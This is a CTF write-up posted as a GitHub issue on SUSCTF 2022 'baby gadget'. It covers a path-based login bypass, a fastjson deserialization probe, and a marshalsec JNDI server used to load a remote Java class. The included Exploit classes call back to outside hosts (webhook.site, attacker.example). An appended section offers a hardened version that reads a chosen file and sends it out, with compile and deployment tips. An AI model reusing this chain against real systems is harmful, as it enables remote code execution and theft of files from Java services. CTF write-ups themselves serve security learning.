SUSCTF 2022 - web/baby gadget v1.0 #52

aszx87410 opened this issue Mar 1, 2022 · 0 comments

We found a login bypass via /;/admin/. After the bypass you can see the admin portal, and there is a mailbox page.


You can download lib.zip to see which libraries they used, and this file is surely the key: fastjson-1.2.48.jar

After a few tries we found that the endpoint POST /admin/mailbox.jsp is vulnerable. We can send JSON data via inputtext={JSON}.

By sending a simple payload, you can confirm that it's vulnerable, because we received the DNS query:

{"abc":{"@type":"java.net.Inet4Address","val":"1486fo.dnslog.cn"}}

After finding the injection entry, we tried a few payloads we found on the internet, but somehow they did not work.

So I followed the instructions here: Red Team Arsenal: RCE exploits for all fastjson vulnerabilities below 1.2.68 (红队武器库:fastjson小于1.2.68全漏洞RCE利用exp) to run an RMI server via:

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://1.1.1.1:8888/#Exploit" 9999

Somehow, my RMI server did receive the request, but the file server (serving Exploit.class) did not.

I decided to change from RMI to JNDI, and it magically worked: it did access my Exploit.class.

But the exploit code still gave no response; we didn't know what to do and were stuck for a while.

Later on, I changed the Java exploit code to Thread.sleep(5) to see whether the remote server executes our code or not, and the answer was, surprisingly, yes.

So I updated my Java exploit to send a request to my server, like this:

import java.io.*;
import java.net.*;
import java.util.*;

public class Exploit{
    // The constructor runs when the JNDI reference instantiates this class on the target,
    // so the callback is placed here rather than in main().
    public Exploit() throws Exception {
        String str = "test";
        URL url = new URL("https://webhook.site/bad84752-95a1-45c4-8395-e5577ea1112b");
        Map<String,Object> params = new LinkedHashMap<>();
        params.put("msg", str);

        // Build an application/x-www-form-urlencoded body: key=value&key=value
        StringBuilder postData = new StringBuilder();
        for (Map.Entry<String,Object> param : params.entrySet()) {
            if (postData.length() != 0) postData.append('&');
            postData.append(URLEncoder.encode(param.getKey(), "UTF-8"));
            postData.append('=');
            postData.append(URLEncoder.encode(String.valueOf(param.getValue()), "UTF-8"));
        }
        byte[] postDataBytes = postData.toString().getBytes("UTF-8");

        HttpURLConnection conn = (HttpURLConnection)url.openConnection();
        conn.setRequestMethod("POST");
        conn.setRequestProperty("Content-Type", "application/x-www-form-urlencoded");
        conn.setRequestProperty("Content-Length", String.valueOf(postDataBytes.length));
        conn.setDoOutput(true);
        conn.getOutputStream().write(postDataBytes);
        // HttpURLConnection only sends the request once the response is read,
        // so opening the input stream is what actually triggers the callback.
        Reader in = new BufferedReader(new InputStreamReader(conn.getInputStream(), "UTF-8"));
    }

    public static void main(String[] args) throws Exception {
    }
}

After receiving the request, I tried to list files and send the result back to my server, but got no response. So I added a try/catch to see what was going on:

String str = "";
try{
  File f = new File("/var");
  File[] paths = f.listFiles();   // null if /var is not a readable directory
  str = paths.toString();
  for (int i = 0; i < paths.length; i++) {
    str += paths[i].toString() + ",";
  }

} catch(Exception e){
   // Report the exception type and message instead of the listing
   str = e.toString() + "," + e.getMessage();
}

It's java.lang.reflect.InvocationTargetException, and I still don't know why the server is throwing this exception. Maybe the server blocks certain functions? Or is it a problem with the JDK version?

Anyway, I was stuck for a while again, and then I decided to try to read a file instead of listing a directory. To my surprise again, it worked.

Here comes the end of the story: I read /flag and, luckily, got the flag. I am a lucky guy.
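As an added example, not part of the writeup above: the file-read-and-callback Exploit class in the shape the writeup works towards, extended with the two things the debugging above was missing, namely a report that unwraps the getCause() chain so a wrapper like InvocationTargetException does not hide the real error, and a payload that runs from both the static initializer and the constructor (different JNDI loading paths trigger one or the other). CALLBACK_URL and TARGET_PATH are placeholders I assumed; replace them with your own collector and the path you want to read.

```java
import java.io.*;
import java.net.*;
import java.nio.charset.StandardCharsets;
import java.nio.file.*;

// Added example (not the writeup author's code). Loaded on the target through the
// JNDI reference; reads TARGET_PATH and POSTs the content, or the full exception
// cause chain, to CALLBACK_URL. Both constants are assumed placeholders.
public class Exploit {
    private static final String CALLBACK_URL = "http://attacker.example/collect"; // assumed
    private static final String TARGET_PATH = "/flag";                             // assumed

    // Some loading paths only initialise the class, others also instantiate it:
    // run the payload from both entry points, but only once.
    private static boolean ran = false;
    static { run(); }
    public Exploit() { run(); }

    private static synchronized void run() {
        if (ran) return;
        ran = true;
        String report;
        try {
            report = "ok:" + readFile(TARGET_PATH);
        } catch (Throwable t) {
            report = "err:" + describe(t);
        }
        // Never let the callback itself throw: that would surface as an
        // initializer error on the target and hide the report.
        try { post(CALLBACK_URL, "msg", report); } catch (Throwable ignored) {}
    }

    static String readFile(String path) throws IOException {
        return new String(Files.readAllBytes(Paths.get(path)), StandardCharsets.UTF_8);
    }

    // Walk getCause() so a reflection wrapper (InvocationTargetException,
    // UndeclaredThrowableException) reports the underlying exception too.
    static String describe(Throwable t) {
        StringBuilder sb = new StringBuilder();
        for (Throwable c = t; c != null; c = c.getCause()) {
            if (sb.length() > 0) sb.append(" <- ");
            sb.append(c.getClass().getName()).append(": ").append(c.getMessage());
        }
        return sb.toString();
    }

    static void post(String urlStr, String key, String value) throws IOException {
        byte[] body = (URLEncoder.encode(key, "UTF-8") + "=" + URLEncoder.encode(value, "UTF-8"))
                .getBytes(StandardCharsets.UTF_8);
        HttpURLConnection conn = (HttpURLConnection) new URL(urlStr).openConnection();
        conn.setRequestMethod("POST");
        conn.setRequestProperty("Content-Type", "application/x-www-form-urlencoded");
        conn.setDoOutput(true);
        conn.setConnectTimeout(5000);
        conn.setReadTimeout(5000);
        try (OutputStream os = conn.getOutputStream()) { os.write(body); }
        // The request is only sent once the response is read: drain it, then close.
        try (InputStream is = conn.getInputStream()) { while (is.read() != -1) {} }
        conn.disconnect();
    }

    public static void main(String[] args) {
        // Local dry run: print the report instead of posting it (no collector needed).
        String path = args.length > 0 ? args[0] : TARGET_PATH;
        try { System.out.println(readFile(path)); }
        catch (Throwable t) { System.out.println(describe(t)); }
    }
}
```

Compile it against the target's Java version (for an old JDK, `javac -source 8 -target 8 Exploit.java`, an assumed but common choice) before serving it from the class file server, otherwise the loader rejects the class and you see the fetch but no callback. Two details worth keeping in mind while debugging blind like this: Thread.sleep takes milliseconds, so a timing probe needs a value in the thousands to be visible, and a class that throws from its static initializer fails with ExceptionInInitializerError on the target, which is why run() swallows everything and puts the error text into the report instead.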
